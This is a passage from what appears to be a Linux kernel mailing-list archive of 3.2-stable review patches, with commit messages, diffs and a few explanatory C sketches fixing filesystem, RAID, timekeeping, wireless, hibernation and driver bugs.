contains just a commit start node. And 'fixup_free_space()' just unmapped this
LEB, which resulted in wiping the commit start node. As a result, some users
were unable to mount the file-system next time with the following symptom:

UBIFS error (pid 1): replay_log_leb: first log node at LEB 3:0 is not CS node
UBIFS error (pid 1): replay_log_leb: log error detected while replaying the log at LEB 3:0

The root cause of this bug was that 'fixup_free_space()' wrongly assumed
that the beginning of empty space in the log head (c->lhead_offs) was known
on mount. However, that is not the case: it was always 0. UBIFS does not store
it in the master node and finds it out by scanning the log on every mount.

The fix is simple - just pass commit start node size instead of 0 to
'fixup_leb()'.
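
For readers unfamiliar with the rounding involved, the sketch below shows
a power-of-two round-up of the kind the fix relies on. The helper name is
hypothetical, and the sizes in the note that follows are example values,
not figures taken from this patch.

```c
#include <assert.h>

/* Round x up to the next multiple of a; a must be a power of two. */
static unsigned int example_align(unsigned int x, unsigned int a)
{
	assert(a != 0 && (a & (a - 1)) == 0);
	return (x + a - 1) & ~(a - 1);
}
```

Assuming, for example, a 32-byte node and a 2048-byte minimum I/O unit,
the empty space would start at offset 2048 rather than at offset 0.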

Signed-off-by: Artem Bityutskiy 
Reported-by: Iwo Mergler 
Tested-by: Iwo Mergler 
Reported-by: James Nute 
Signed-off-by: Ben Hutchings 
---
 fs/ubifs/sb.c |8 ++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/fs/ubifs/sb.c b/fs/ubifs/sb.c
index ef3d1ba..15e2fc5 100644
--- a/fs/ubifs/sb.c
+++ b/fs/ubifs/sb.c
@@ -718,8 +718,12 @@ static int fixup_free_space(struct ubifs_info *c)
lnum = ubifs_next_log_lnum(c, lnum);
}
 
-   /* Fixup the current log head */
-   err = fixup_leb(c, c->lhead_lnum, c->lhead_offs);
+   /*
+* Fixup the log head which contains the only a CS node at the
+* beginning.
+*/
+   err = fixup_leb(c, c->lhead_lnum,
+   ALIGN(UBIFS_CS_NODE_SZ, c->min_io_size));
if (err)
goto out;
 




[ 065/108] md/raid1: close some possible races on write errors during resync

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: NeilBrown 

commit 58e94ae18478c08229626daece2fc108a4a23261 upstream.

commit 4367af556133723d0f443e14ca8170d9447317cb
   md/raid1: clear bad-block record when write succeeds.

Added a 'reschedule_retry' call possibility at the end of
end_sync_write, but didn't add matching code at the end of
sync_request_write.  So if the writes complete very quickly, or
scheduling makes it seem that way, then we can miss rescheduling
the request and the resync could hang.

Also commit 73d5c38a9536142e062c35997b044e89166e063b
md: avoid races when stopping resync.

Fixed a race condition in this same code in end_sync_write but didn't
make the change in sync_request_write.

This patch updates sync_request_write to fix both of those.
Patch is suitable for 3.1 and later kernels.
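
The diff below copies r1_bio->sectors into a local before calling
put_buf(), presumably so the value is not read from the buffer after it
has been released. A sketch of that ordering pattern, with hypothetical
types and a release function that only simulates the buffer going away:

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for a buffer that may be recycled on release. */
struct example_bio {
	int sectors;
	int released;
};

/* Simulated release: after this the fields must not be trusted. */
static void example_put_buf(struct example_bio *b)
{
	assert(b != NULL);
	b->sectors = -1;
	b->released = 1;
}

/* Save what is needed first, release second, use the saved copy last. */
static int example_finish(struct example_bio *b)
{
	int s = b->sectors;

	example_put_buf(b);
	return s;	/* stands in for md_done_sync(mddev, s, 1) */
}
```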

Reported-by: Alexander Lyakas 
Original-version-by: Alexander Lyakas 
Signed-off-by: NeilBrown 
Signed-off-by: Ben Hutchings 
---
 drivers/md/raid1.c |   10 --
 1 file changed, 8 insertions(+), 2 deletions(-)

diff --git a/drivers/md/raid1.c b/drivers/md/raid1.c
index 240ff31..cacd008 100644
--- a/drivers/md/raid1.c
+++ b/drivers/md/raid1.c
@@ -1818,8 +1818,14 @@ static void sync_request_write(struct mddev *mddev, struct r1bio *r1_bio)
 
if (atomic_dec_and_test(&r1_bio->remaining)) {
/* if we're here, all write(s) have completed, so clean up */
-   md_done_sync(mddev, r1_bio->sectors, 1);
-   put_buf(r1_bio);
+   int s = r1_bio->sectors;
+   if (test_bit(R1BIO_MadeGood, &r1_bio->state) ||
+   test_bit(R1BIO_WriteError, &r1_bio->state))
+   reschedule_retry(r1_bio);
+   else {
+   put_buf(r1_bio);
+   md_done_sync(mddev, s, 1);
+   }
}
 }
 




[ 080/108] timekeeping: Maintain ktime_t based offsets for hrtimers

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Thomas Gleixner 

This is a backport of 5b9fe759a678e05be4937ddf03d50e950207c1c0

We need to update the hrtimer clock offsets from the hrtimer interrupt
context. To avoid conversions from timespec to ktime_t maintain a
ktime_t based representation of those offsets in the timekeeper. This
puts the conversion overhead into the code which updates the
underlying offsets and provides fast accessible values in the hrtimer
interrupt.
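
As a userspace sketch of the conversion done once at update time: negate
wall_to_monotonic, normalize it, and keep the result as a scalar
nanosecond value. All names below are hypothetical; the kernel uses
set_normalized_timespec() and timespec_to_ktime() for this.

```c
#include <assert.h>
#include <stdint.h>

#define EXAMPLE_NSEC_PER_SEC 1000000000LL

struct example_timespec {
	int64_t tv_sec;
	int64_t tv_nsec;
};

/* Bring tv_nsec into [0, NSEC_PER_SEC), adjusting tv_sec to match. */
static struct example_timespec example_normalize(int64_t sec, int64_t nsec)
{
	struct example_timespec ts;

	while (nsec >= EXAMPLE_NSEC_PER_SEC) {
		nsec -= EXAMPLE_NSEC_PER_SEC;
		sec++;
	}
	while (nsec < 0) {
		nsec += EXAMPLE_NSEC_PER_SEC;
		sec--;
	}
	ts.tv_sec = sec;
	ts.tv_nsec = nsec;
	return ts;
}

/* Scalar nanoseconds, in the spirit of a ktime_t value. */
static int64_t example_to_ns(struct example_timespec ts)
{
	assert(ts.tv_nsec >= 0 && ts.tv_nsec < EXAMPLE_NSEC_PER_SEC);
	return ts.tv_sec * EXAMPLE_NSEC_PER_SEC + ts.tv_nsec;
}

/* The monotonic -> realtime offset is the negated wall_to_monotonic. */
static int64_t example_offs_real(struct example_timespec wtm)
{
	return example_to_ns(example_normalize(-wtm.tv_sec, -wtm.tv_nsec));
}
```

The interrupt path can then add the cached scalar directly instead of
converting a timespec each time.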

Signed-off-by: Thomas Gleixner 
Signed-off-by: John Stultz 
Reviewed-by: Ingo Molnar 
Acked-by: Peter Zijlstra 
Acked-by: Prarit Bhargava 
Link: http://lkml.kernel.org/r/1341960205-56738-4-git-send-email-johns...@us.ibm.com
Signed-off-by: Thomas Gleixner 
[John Stultz: Backported to 3.2]
Cc: Prarit Bhargava 
Cc: Thomas Gleixner 
Cc: Linux Kernel 
Signed-off-by: John Stultz 
Signed-off-by: Ben Hutchings 
---
 kernel/time/timekeeping.c |   25 -
 1 file changed, 24 insertions(+), 1 deletion(-)

diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
index 8958ad7..d5d0e5d 100644
--- a/kernel/time/timekeeping.c
+++ b/kernel/time/timekeeping.c
@@ -161,18 +161,34 @@ static struct timespec xtime __attribute__ ((aligned (16)));
 static struct timespec wall_to_monotonic __attribute__ ((aligned (16)));
 static struct timespec total_sleep_time;
 
+/* Offset clock monotonic -> clock realtime */
+static ktime_t offs_real;
+
+/* Offset clock monotonic -> clock boottime */
+static ktime_t offs_boot;
+
 /*
  * The raw monotonic time for the CLOCK_MONOTONIC_RAW posix clock.
  */
 static struct timespec raw_time;
 
 /* must hold write on xtime_lock */
+static void update_rt_offset(void)
+{
+   struct timespec tmp, *wtm = &wall_to_monotonic;
+
+   set_normalized_timespec(&tmp, -wtm->tv_sec, -wtm->tv_nsec);
+   offs_real = timespec_to_ktime(tmp);
+}
+
+/* must hold write on xtime_lock */
 static void timekeeping_update(bool clearntp)
 {
if (clearntp) {
timekeeper.ntp_error = 0;
ntp_clear();
}
+   update_rt_offset();
update_vsyscall(&xtime, &wall_to_monotonic,
 timekeeper.clock, timekeeper.mult);
 }
@@ -587,6 +603,7 @@ void __init timekeeping_init(void)
}
set_normalized_timespec(&wall_to_monotonic,
-boot.tv_sec, -boot.tv_nsec);
+   update_rt_offset();
total_sleep_time.tv_sec = 0;
total_sleep_time.tv_nsec = 0;
write_sequnlock_irqrestore(&xtime_lock, flags);
@@ -595,6 +612,12 @@ void __init timekeeping_init(void)
 /* time in seconds when suspend began */
 static struct timespec timekeeping_suspend_time;
 
+static void update_sleep_time(struct timespec t)
+{
+   total_sleep_time = t;
+   offs_boot = timespec_to_ktime(t);
+}
+
 /**
  * __timekeeping_inject_sleeptime - Internal function to add sleep interval
  * @delta: pointer to a timespec delta value
@@ -612,7 +635,7 @@ static void __timekeeping_inject_sleeptime(struct timespec *delta)
 
xtime = timespec_add(xtime, *delta);
wall_to_monotonic = timespec_sub(wall_to_monotonic, *delta);
-   total_sleep_time = timespec_add(total_sleep_time, *delta);
+   update_sleep_time(timespec_add(total_sleep_time, *delta));
 }
 
 




[ 073/108] dm raid1: set discard_zeroes_data_unsupported

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Mikulas Patocka 

commit 7c8d3a42fe1c58a7e8fd3f6a013e7d7b474ff931 upstream.

We can't guarantee that REQ_DISCARD on dm-mirror zeroes the data even if
the underlying disks support zero on discard.  So this patch sets
ti->discard_zeroes_data_unsupported.

For example, if the mirror is in the process of resynchronizing, it may
happen that kcopyd reads a piece of data, then discard is sent on the
same area and then kcopyd writes the piece of data to another leg.
Consequently, the data is not zeroed.
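
The interleaving described above can be replayed in a toy model with one
byte per mirror leg. The struct and function are hypothetical and only
mimic the order of events, not the real kcopyd or discard paths.

```c
#include <assert.h>
#include <stddef.h>

/* Toy mirror: one byte of data per leg. */
struct example_mirror {
	unsigned char leg0;
	unsigned char leg1;
};

/* Replay: kcopyd read, then discard, then kcopyd write of stale data. */
static unsigned char example_resync_with_discard(struct example_mirror *m)
{
	unsigned char copy;

	assert(m != NULL);
	copy = m->leg0;		/* kcopyd reads from the source leg */
	m->leg0 = 0;		/* discard zeroes the area on both legs */
	m->leg1 = 0;
	m->leg1 = copy;		/* kcopyd writes what it read earlier */
	return m->leg1;
}
```

After this sequence the second leg holds the old data again even though a
discard was issued, so zeroes cannot be promised to the caller.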

The flag was made available by commit 983c7db347db8ce2d8453fd1d89b7a4bb6920d56
(dm crypt: always disable discard_zeroes_data).

Signed-off-by: Mikulas Patocka 
Signed-off-by: Alasdair G Kergon 
Signed-off-by: Ben Hutchings 
---
 drivers/md/dm-raid1.c |1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
index ea16984..b58b7a3 100644
--- a/drivers/md/dm-raid1.c
+++ b/drivers/md/dm-raid1.c
@@ -1084,6 +1084,7 @@ static int mirror_ctr(struct dm_target *ti, unsigned int argc, char **argv)
ti->split_io = dm_rh_get_region_size(ms->rh);
ti->num_flush_requests = 1;
ti->num_discard_requests = 1;
+   ti->discard_zeroes_data_unsupported = 1;
 
ms->kmirrord_wq = alloc_workqueue("kmirrord",
  WQ_NON_REENTRANT | WQ_MEM_RECLAIM, 0);




[ 055/108] iwlegacy: dont mess up the SCD when removing a key

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Emmanuel Grumbach 

commit b48d96652626b315229b1b82c6270eead6a77a6d upstream.

When we remove a key, we put a key index which was supposed
to tell the fw that we are actually removing the key. But
instead the fw took that index as a valid index and messed
up the SRAM of the device.

This memory corruption on the device mangled the data of
the SCD. The impact on the user is that SCD queue 2 got
stuck after having removed keys.

Reported-by: Paul Bolle 
Signed-off-by: Emmanuel Grumbach 
Signed-off-by: Stanislaw Gruszka 
Signed-off-by: John W. Linville 
[bwh: Backported to 3.2: adjust filename, context and variable name]
Signed-off-by: Ben Hutchings 
---
 drivers/net/wireless/iwlegacy/4965-mac.c |4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

--- a/drivers/net/wireless/iwlegacy/iwl-4965-sta.c
+++ b/drivers/net/wireless/iwlegacy/iwl-4965-sta.c
@@ -466,7 +466,7 @@ int iwl4965_remove_dynamic_key(struct iw
return 0;
}
 
-   if (priv->stations[sta_id].sta.key.key_offset == WEP_INVALID_OFFSET) {
+   if (priv->stations[sta_id].sta.key.key_flags & STA_KEY_FLG_INVALID) {
IWL_WARN(priv, "Removing wrong key %d 0x%x\n",
keyconf->keyidx, key_flags);
spin_unlock_irqrestore(&priv->sta_lock, flags);
@@ -483,7 +483,7 @@ int iwl4965_remove_dynamic_key(struct iw
sizeof(struct iwl4965_keyinfo));
priv->stations[sta_id].sta.key.key_flags =
STA_KEY_FLG_NO_ENC | STA_KEY_FLG_INVALID;
-   priv->stations[sta_id].sta.key.key_offset = WEP_INVALID_OFFSET;
+   priv->stations[sta_id].sta.key.key_offset = keyconf->hw_key_idx;
priv->stations[sta_id].sta.sta.modify_mask = STA_MODIFY_KEY_MASK;
priv->stations[sta_id].sta.mode = STA_CONTROL_MODIFY_MSK;
 




[ 049/108] PM / Hibernate: Hibernate/thaw fixes/improvements

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Bojan Smojver 

commit 5a21d489fd9541a4a66b9a500659abaca1b19a51 upstream.

 1. Do not allocate memory for buffers from emergency pools, unless
absolutely required. Do not warn about and do not retry non-essential
failed allocations.

 2. Do not check the amount of free pages left on every single page
write, but wait until one map is completely populated and then check.

 3. Set maximum number of pages for read buffering consistently, instead
of inadvertently depending on the size of the sector type.

 4. Fix copyright line, which I missed when I submitted the hibernation
threading patch.

 5. Dispense with bit shifting arithmetic to improve readability.

 6. Really recalculate the number of pages required to be free after all
allocations have been done.

 7. Fix calculation of pages required for read buffering. Only count in
pages that do not belong to high memory.

Signed-off-by: Bojan Smojver 
Signed-off-by: Rafael J. Wysocki 
Signed-off-by: Ben Hutchings 
---
 kernel/power/swap.c |   62 ---
 1 file changed, 39 insertions(+), 23 deletions(-)

diff --git a/kernel/power/swap.c b/kernel/power/swap.c
index eef311a..11e22c0 100644
--- a/kernel/power/swap.c
+++ b/kernel/power/swap.c
@@ -6,7 +6,7 @@
  *
  * Copyright (C) 1998,2001-2005 Pavel Machek 
  * Copyright (C) 2006 Rafael J. Wysocki 
- * Copyright (C) 2010 Bojan Smojver 
+ * Copyright (C) 2010-2012 Bojan Smojver 
  *
  * This file is released under the GPLv2.
  *
@@ -282,14 +282,17 @@ static int write_page(void *buf, sector_t offset, struct bio **bio_chain)
return -ENOSPC;
 
if (bio_chain) {
-   src = (void *)__get_free_page(__GFP_WAIT | __GFP_HIGH);
+   src = (void *)__get_free_page(__GFP_WAIT | __GFP_NOWARN |
+ __GFP_NORETRY);
if (src) {
copy_page(src, buf);
} else {
ret = hib_wait_on_bio_chain(bio_chain); /* Free pages */
if (ret)
return ret;
-   src = (void *)__get_free_page(__GFP_WAIT | __GFP_HIGH);
+   src = (void *)__get_free_page(__GFP_WAIT |
+ __GFP_NOWARN |
+ __GFP_NORETRY);
if (src) {
copy_page(src, buf);
} else {
@@ -367,12 +370,17 @@ static int swap_write_page(struct swap_map_handle *handle, void *buf,
clear_page(handle->cur);
handle->cur_swap = offset;
handle->k = 0;
-   }
-   if (bio_chain && low_free_pages() <= handle->reqd_free_pages) {
-   error = hib_wait_on_bio_chain(bio_chain);
-   if (error)
-   goto out;
-   handle->reqd_free_pages = reqd_free_pages();
+
+   if (bio_chain && low_free_pages() <= handle->reqd_free_pages) {
+   error = hib_wait_on_bio_chain(bio_chain);
+   if (error)
+   goto out;
+   /*
+* Recalculate the number of required free pages, to
+* make sure we never take more than half.
+*/
+   handle->reqd_free_pages = reqd_free_pages();
+   }
}
  out:
return error;
@@ -419,8 +427,9 @@ static int swap_writer_finish(struct swap_map_handle *handle,
 /* Maximum number of threads for compression/decompression. */
 #define LZO_THREADS 3
 
-/* Maximum number of pages for read buffering. */
-#define LZO_READ_PAGES (MAP_PAGE_ENTRIES * 8)
+/* Minimum/maximum number of pages for read buffering. */
+#define LZO_MIN_RD_PAGES   1024
+#define LZO_MAX_RD_PAGES   8192
 
 
 /**
@@ -631,12 +640,6 @@ static int save_image_lzo(struct swap_map_handle *handle,
}
 
/*
-* Adjust number of free pages after all allocations have been done.
-* We don't want to run out of pages when writing.
-*/
-   handle->reqd_free_pages = reqd_free_pages();
-
-   /*
 * Start the CRC32 thread.
 */
init_waitqueue_head(&crc->go);
@@ -657,6 +660,12 @@ static int save_image_lzo(struct swap_map_handle *handle,
goto out_clean;
}
 
+   /*
+* Adjust the number of required free pages after all allocations have
+* been done. We don't want to run out of pages when writing.
+*/
+   handle->reqd_free_pages = reqd_free_pages();
+
printk(KERN_INFO
"PM: Using %u thread(s) for compression.\n"
"PM: Compressing and saving image data (%u pages) ... ",
@@ -10

[ 048/108] NFC: Export nfc.h to userland

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Samuel Ortiz 

commit dbd4fcaf8d664fab4163b1f8682e41ad8bff3444 upstream.

The netlink commands and attributes, along with the socket structure
definitions need to be exported.

Signed-off-by: Samuel Ortiz 
Signed-off-by: John W. Linville 
Signed-off-by: Ben Hutchings 
---
 include/linux/Kbuild |1 +
 1 file changed, 1 insertion(+)

diff --git a/include/linux/Kbuild b/include/linux/Kbuild
index 3c9b616..f08e3ae 100644
--- a/include/linux/Kbuild
+++ b/include/linux/Kbuild
@@ -271,6 +271,7 @@ header-y += netfilter_ipv4.h
 header-y += netfilter_ipv6.h
 header-y += netlink.h
 header-y += netrom.h
+header-y += nfc.h
 header-y += nfs.h
 header-y += nfs2.h
 header-y += nfs3.h


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 050/108] cfg80211: check iface combinations only when iface is running

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Michal Kazior 

commit f8cdddb8d61d16a156229f0910f7ecfc7a82c003 upstream.

Don't validate interface combinations on a stopped
interface. Otherwise we might end up being able to
create a new interface with a certain type, but
won't be able to change an existing interface
into that type.

This also skips some other functions when the
interface is stopped and its type is being changed.

Signed-off-by: Michal Kazior 
Signed-off-by: Johannes Berg 
Signed-off-by: Ben Hutchings 
---
 net/wireless/util.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/wireless/util.c b/net/wireless/util.c
index 8f2d68f..316cfd0 100644
--- a/net/wireless/util.c
+++ b/net/wireless/util.c
@@ -804,7 +804,7 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev,
 ntype == NL80211_IFTYPE_P2P_CLIENT))
return -EBUSY;
 
-   if (ntype != otype) {
+   if (ntype != otype && netif_running(dev)) {
err = cfg80211_can_change_interface(rdev, dev->ieee80211_ptr,
ntype);
if (err)


[ 047/108] Remove easily user-triggerable BUG from generic_setlease

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Dave Jones 

commit 8d657eb3b43861064d36241e88d9d61c709f33f0 upstream.

This can be trivially triggered from userspace by passing in something 
unexpected.

kernel BUG at fs/locks.c:1468!
invalid opcode:  [#1] SMP
RIP: 0010:generic_setlease+0xc2/0x100
Call Trace:
  __vfs_setlease+0x35/0x40
  fcntl_setlease+0x76/0x150
  sys_fcntl+0x1c6/0x810
  system_call_fastpath+0x1a/0x1f
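
The point of the change is that an unexpected argument coming from userspace should produce an error code, not a kernel BUG. A minimal userspace sketch of that pattern, where setlease_model is a hypothetical stand-in and the "return 0 for known types" body is a simplification:

```c
#include <errno.h>
#include <fcntl.h>

/*
 * Hypothetical stand-in for generic_setlease(): returns 0 when the request
 * is one of the known lease types, -EINVAL for anything else.
 */
static int setlease_model(long arg)
{
    switch (arg) {
    case F_UNLCK:
    case F_RDLCK:
    case F_WRLCK:
        return 0;
    default:
        /* Caller-controlled input: report it, do not crash. */
        return -EINVAL;
    }
}
```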

Signed-off-by: Dave Jones 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/locks.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/fs/locks.c b/fs/locks.c
index 814c51d..fce6238 100644
--- a/fs/locks.c
+++ b/fs/locks.c
@@ -1465,7 +1465,7 @@ int generic_setlease(struct file *filp, long arg, struct file_lock **flp)
case F_WRLCK:
return generic_add_lease(filp, arg, flp);
default:
-   BUG();
+   return -EINVAL;
}
 }
 EXPORT_SYMBOL(generic_setlease);


[ 046/108] block: fix infinite loop in __getblk_slow

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jeff Moyer 

commit 91f68c89d8f35fe98ea04159b9a3b42d0149478f upstream.

Commit 080399aaaf35 ("block: don't mark buffers beyond end of disk as
mapped") exposed a bug in __getblk_slow that causes mount to hang as it
loops infinitely waiting for a buffer that lies beyond the end of the
disk to become uptodate.

The problem was initially reported by Torsten Hilbrich here:

https://lkml.org/lkml/2012/6/18/54

and also reported independently here:

http://www.sysresccd.org/forums/viewtopic.php?f=13&t=4511

and then Richard W.M.  Jones and Marcos Mello noted a few separate
bugzillas also associated with the same issue.  This patch has been
confirmed to fix:

https://bugzilla.redhat.com/show_bug.cgi?id=835019

The main problem is here, in __getblk_slow:

for (;;) {
struct buffer_head * bh;
int ret;

bh = __find_get_block(bdev, block, size);
if (bh)
return bh;

ret = grow_buffers(bdev, block, size);
if (ret < 0)
return NULL;
if (ret == 0)
free_more_memory();
}

__find_get_block does not find the block, since it will not be marked as
mapped, and so grow_buffers is called to fill in the buffers for the
associated page.  I believe the for (;;) loop is there primarily to
retry in the case of memory pressure keeping grow_buffers from
succeeding.  However, we also continue to loop for other cases, like the
block lying beyond the end of the disk.  So, the fix I came up with is to
only loop when grow_buffers fails due to memory allocation issues
(return value of 0).
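
The retry rule described above can be sketched as a small userspace model. All names here (fake_dev, fake_find, fake_grow, getblk_slow_model) are hypothetical. The model assumes that growing buffers for a block past the end of the disk reports success but never makes the block findable.

```c
/* Toy model of the retry logic; every name here is hypothetical. */
struct fake_dev {
    int pressure_rounds; /* times grow fails for lack of memory (returns 0) */
    int beyond_end;      /* nonzero: the block lies past the end of the disk */
    int present;         /* nonzero: a lookup would find the block */
    int grow_calls;      /* how often fake_grow() ran */
};

static int fake_find(const struct fake_dev *d)
{
    return d->present;
}

/* 0 = no memory, retry later; > 0 = buffers were created for the page. */
static int fake_grow(struct fake_dev *d)
{
    d->grow_calls++;
    if (d->pressure_rounds > 0) {
        d->pressure_rounds--;
        return 0;
    }
    if (!d->beyond_end)
        d->present = 1;  /* a block past the end is never marked mapped */
    return 1;
}

/* Returns 1 if the block was obtained, 0 where the kernel returns NULL. */
static int getblk_slow_model(struct fake_dev *d)
{
    int ret;

retry:
    if (fake_find(d))
        return 1;

    ret = fake_grow(d);
    if (ret == 0)
        goto retry;      /* only memory pressure justifies another pass */
    if (ret > 0 && fake_find(d))
        return 1;
    return 0;            /* error, or block still not found: give up */
}
```

In this model a device with beyond_end set makes exactly one grow attempt and then fails, where an unconditional for (;;) loop would never terminate.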

The attached patch was tested by myself, Torsten, and Rich, and was
found to resolve the problem in all cases.

Signed-off-by: Jeff Moyer 
Reported-and-Tested-by: Torsten Hilbrich 
Tested-by: Richard W.M. Jones 
Reviewed-by: Josh Boyer 
[ Jens is on vacation, taking this directly  - Linus ]
--
Stable Notes: this patch requires backport to 3.0, 3.2 and 3.3.
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/buffer.c |   22 +-
 1 file changed, 13 insertions(+), 9 deletions(-)

diff --git a/fs/buffer.c b/fs/buffer.c
index 838a9cf..c7062c8 100644
--- a/fs/buffer.c
+++ b/fs/buffer.c
@@ -1036,6 +1036,9 @@ grow_buffers(struct block_device *bdev, sector_t block, int size)
 static struct buffer_head *
 __getblk_slow(struct block_device *bdev, sector_t block, int size)
 {
+   int ret;
+   struct buffer_head *bh;
+
/* Size must be multiple of hard sectorsize */
if (unlikely(size & (bdev_logical_block_size(bdev)-1) ||
(size < 512 || size > PAGE_SIZE))) {
@@ -1048,20 +1051,21 @@ __getblk_slow(struct block_device *bdev, sector_t block, int size)
return NULL;
}
 
-   for (;;) {
-   struct buffer_head * bh;
-   int ret;
+retry:
+   bh = __find_get_block(bdev, block, size);
+   if (bh)
+   return bh;
 
+   ret = grow_buffers(bdev, block, size);
+   if (ret == 0) {
+   free_more_memory();
+   goto retry;
+   } else if (ret > 0) {
bh = __find_get_block(bdev, block, size);
if (bh)
return bh;
-
-   ret = grow_buffers(bdev, block, size);
-   if (ret < 0)
-   return NULL;
-   if (ret == 0)
-   free_more_memory();
}
+   return NULL;
 }
 
 /*


[ 044/108] hwmon: (it87) Preserve configuration register bits on init

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jean Delvare 

commit 41002f8dd5938d5ad1d008ce5bfdbfe47fa7b4e8 upstream.

We were accidentally losing one bit in the configuration register on
device initialization. It was reported to freeze one specific system
right away. Properly preserve all bits we don't explicitly want to
change in order to prevent that.
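
The two masks in the diff, 0x36 and 0x3e, differ only in bit 3 (0x08), so that is the bit the old code cleared. A small sketch of the read-modify-write, with it87_new_config as a hypothetical helper name:

```c
#include <stdint.h>

/*
 * Value written back to the configuration register. keep_mask selects the
 * bits preserved from the old value; 0x41 / 0x01 are the bits the driver
 * sets, as in the diff. The function name is hypothetical.
 */
static uint8_t it87_new_config(uint8_t old, uint8_t keep_mask, int update_vbat)
{
    return (uint8_t)((old & keep_mask) | (update_vbat ? 0x41 : 0x01));
}
```

With an old register value of 0x08, the mask 0x36 yields 0x01 (bit 3 lost) while 0x3e yields 0x09 (bit 3 kept).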

Reported-by: Stevie Trujillo 
Signed-off-by: Jean Delvare 
Reviewed-by: Guenter Roeck 
Signed-off-by: Ben Hutchings 
---
 drivers/hwmon/it87.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/hwmon/it87.c b/drivers/hwmon/it87.c
index e7701d9..f1de397 100644
--- a/drivers/hwmon/it87.c
+++ b/drivers/hwmon/it87.c
@@ -2341,7 +2341,7 @@ static void __devinit it87_init_device(struct platform_device *pdev)
 
/* Start monitoring */
it87_write_value(data, IT87_REG_CONFIG,
-(it87_read_value(data, IT87_REG_CONFIG) & 0x36)
+(it87_read_value(data, IT87_REG_CONFIG) & 0x3e)
 | (update_vbat ? 0x41 : 0x01));
 }
 


[ 045/108] ARM: SAMSUNG: fix race in s3c_adc_start for ADC

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Todd Poynor 

commit 8265981bb439f3ecc5356fb877a6c2a6636ac88a upstream.

Checking for adc->ts_pend already claimed should be done with the
lock held.

Signed-off-by: Todd Poynor 
Acked-by: Ben Dooks 
Signed-off-by: Kukjin Kim 
Signed-off-by: Ben Hutchings 
---
 arch/arm/plat-samsung/adc.c |8 +---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/arch/arm/plat-samsung/adc.c b/arch/arm/plat-samsung/adc.c
index 33ecd0c..b1e05cc 100644
--- a/arch/arm/plat-samsung/adc.c
+++ b/arch/arm/plat-samsung/adc.c
@@ -157,11 +157,13 @@ int s3c_adc_start(struct s3c_adc_client *client,
return -EINVAL;
}
 
-   if (client->is_ts && adc->ts_pend)
-   return -EAGAIN;
-
spin_lock_irqsave(&adc->lock, flags);
 
+   if (client->is_ts && adc->ts_pend) {
+   spin_unlock_irqrestore(&adc->lock, flags);
+   return -EAGAIN;
+   }
+
client->channel = channel;
client->nr_samples = nr_samples;
 


[ 039/108] ocfs2: fix NULL pointer dereference in __ocfs2_change_file_space()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Luis Henriques 

commit a4e08d001f2e50bb8b3c4eebadcf08e5535f02ee upstream.

As ocfs2_fallocate() will invoke __ocfs2_change_file_space() with a NULL
as the first parameter (file), it may trigger a NULL pointer dereference
due to a missing check.
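
The guard amounts to testing the pointer before reading a field through it. A minimal userspace sketch, where struct file_model and wants_sync are hypothetical stand-ins for the kernel types:

```c
#include <fcntl.h>
#include <stddef.h>

/* Hypothetical, cut-down stand-in for struct file. */
struct file_model {
    unsigned int f_flags;
};

/* Nonzero only when a file was supplied and it was opened with O_SYNC. */
static int wants_sync(const struct file_model *file)
{
    /* && short-circuits, so f_flags is never read through a NULL pointer. */
    return file && (file->f_flags & O_SYNC);
}
```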

Addresses http://bugs.launchpad.net/bugs/1006012

Signed-off-by: Luis Henriques 
Reported-by: Bret Towe 
Tested-by: Bret Towe 
Cc: Sunil Mushran 
Acked-by: Joel Becker 
Acked-by: Mark Fasheh 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/ocfs2/file.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
index 98513c8..7602783 100644
--- a/fs/ocfs2/file.c
+++ b/fs/ocfs2/file.c
@@ -1950,7 +1950,7 @@ static int __ocfs2_change_file_space(struct file *file, struct inode *inode,
if (ret < 0)
mlog_errno(ret);
 
-   if (file->f_flags & O_SYNC)
+   if (file && (file->f_flags & O_SYNC))
handle->h_sync = 1;
 
ocfs2_commit_trans(osb, handle);


[ 041/108] drivers/rtc/rtc-mxc.c: fix irq enabled interrupts warning

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Benoît Thébaudeau 

commit b59f6d1febd6cbe9fae4589bf72da0ed32bc69e0 upstream.

Fixes

